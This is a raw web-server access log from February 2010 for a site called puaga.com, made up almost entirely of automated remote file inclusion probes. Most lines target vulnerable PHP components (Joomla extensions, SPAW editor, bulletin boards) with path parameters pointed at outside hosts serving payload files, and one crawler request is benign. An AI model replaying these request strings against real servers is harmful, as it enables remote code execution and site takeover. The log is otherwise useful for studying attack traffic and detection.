110.45.145.178 - - [18/Feb/2010:09:54:17 -0800] "GET /logs/access_100203.log//write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:09:54:18 -0800] "GET /logs/access_100202.log%20%20//spaw_control.class.php?spaw_root=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:09:54:18 -0800] "GET /spaw_control.class.php?spaw_root=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:09:54:18 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:09:54:30 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:09:54:30 -0800] "GET /spaw_control.class.php?spaw_root=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:09:54:30 -0800] "GET /logs/access_100202.log%20%20//spaw_control.class.php?spaw_root=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:54:45 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:54:45 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:54:45 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:54:46 -0800] "GET /logs/access_100118.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:54:55 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:54:55 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:54:55 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:55:03 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:55:03 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:55:03 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:55:07 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:55:17 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:09:55:25 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:09:55:35 -0800] "GET /logs/access_100116.log/lostpasswd.php?env[include_prefix]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:56:16 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:56:16 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:56:16 -0800] "GET /logs/access_100107.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:56:27 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:56:27 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:56:27 -0800] "GET /logs/access_100107.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:09:56:28 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:09:56:29 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:09:56:30 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:09:56:36 -0800] "GET /logs/access_100125.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:09:56:37 -0800] "GET /logs/access_100112.log%20%20//spaw_control.class.php?spaw_root=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:09:56:38 -0800] "GET /logs/access_100112.log%20%20//spaw_control.class.php?spaw_root=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:09:56:39 -0800] "GET /logs/access_100202.log/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:09:56:48 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:09:56:49 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:09:56:51 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:09:57:03 -0800] "GET /logs/access_100125.log/send_reminders.php?includedir=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [18/Feb/2010:09:57:14 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [18/Feb/2010:09:57:15 -0800] "GET /orange_g/forum/viewtopic.php?p=25211 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
89.36.175.10 - - [18/Feb/2010:09:58:08 -0800] "GET /logs/access_100111.log/lostpasswd.php?env[include_prefix]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:09:58:10 -0800] "GET /logs/access_100205.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:09:58:41 -0800] "GET /logs/access_100205.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:09:58:50 -0800] "GET /logs/access_100107.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:09:58:51 -0800] "GET /logs/access_100125.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:10:00:50 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:10:00:50 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:01:22 -0800] "GET /logs/access_100206.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:01:22 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:01:23 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:10:01:48 -0800] "GET /export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:10:01:48 -0800] "GET /logs/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:10:01:48 -0800] "GET /logs/access_100111.log/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:01:50 -0800] "GET /logs/access_100115.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:10:02:04 -0800] "GET /logs/access_100130.log/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:10:02:08 -0800] "GET /logs/access_100127.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:02:14 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:02:14 -0800] "GET /logs/access_100206.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:02:14 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:02:35 -0800] "GET /logs/access_100115.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:10:03:56 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:10:03:56 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:10:03:56 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:10:04:09 -0800] "GET /logs/access_100127.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:10:04:43 -0800] "GET /logs/access_100117.log//include/admin.lib.inc.php?site_path=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:10:05:00 -0800] "GET /logs/access_100115.log//include/admin.lib.inc.php?site_path=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [18/Feb/2010:10:05:13 -0800] "GET /logs/access_100128.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:10:06:17 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:10:06:17 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:10:06:17 -0800] "GET /logs/access_100123.log%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:10:07:51 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:10:07:51 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:10:07:51 -0800] "GET /logs/access_100119.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:10:07:58 -0800] "GET /logs/access_100125.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:10:08:06 -0800] "GET /logs/access_100125.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:10:08:08 -0800] "GET /logs/access_100126.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:10:08:11 -0800] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:10:08:11 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:10:08:11 -0800] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:10:08:13 -0800] "GET /logs/access_100125.log//bbs/delete_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:10:08:33 -0800] "GET /logs/access.log//bbs/delete_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:10:08:42 -0800] "GET /logs/access_100127.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:10:08:42 -0800] "GET /logs/access_100128.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.77.220 - - [18/Feb/2010:10:08:53 -0800] "GET /logs/access_100128.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:10:08:58 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:10:09:03 -0800] "GET /logs/access_100204.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:10:09:03 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:10:10:11 -0800] "GET /logs/access_100123.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:12:54 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:12:54 -0800] "GET /logs/access.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:12:54 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:10:13:12 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:10:13:12 -0800] "GET /logs/access_100111.log/show_image_in_imgtag.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:10:13:12 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:13:15 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:13:15 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:13:15 -0800] "GET /lostpasswd.php?env[include_prefix]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:13:19 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:13:19 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:13:20 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:13:21 -0800] "GET /logs/access_100105.log%20%20/lostpasswd.php?env[include_prefix]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:10:13:28 -0800] "GET /logs/access_100130.log/show_image_in_imgtag.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:13:46 -0800] "GET /logs/access_100115.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [18/Feb/2010:10:13:57 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [18/Feb/2010:10:13:57 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [18/Feb/2010:10:13:57 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [18/Feb/2010:10:14:19 -0800] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:15:20 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:10:15:31 -0800] "GET /logs/access_100207.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:10:15:31 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:16:18 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:16:18 -0800] "GET /logs/access_100124.log%20%20///bbs/write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:16:18 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:16:25 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:16:26 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
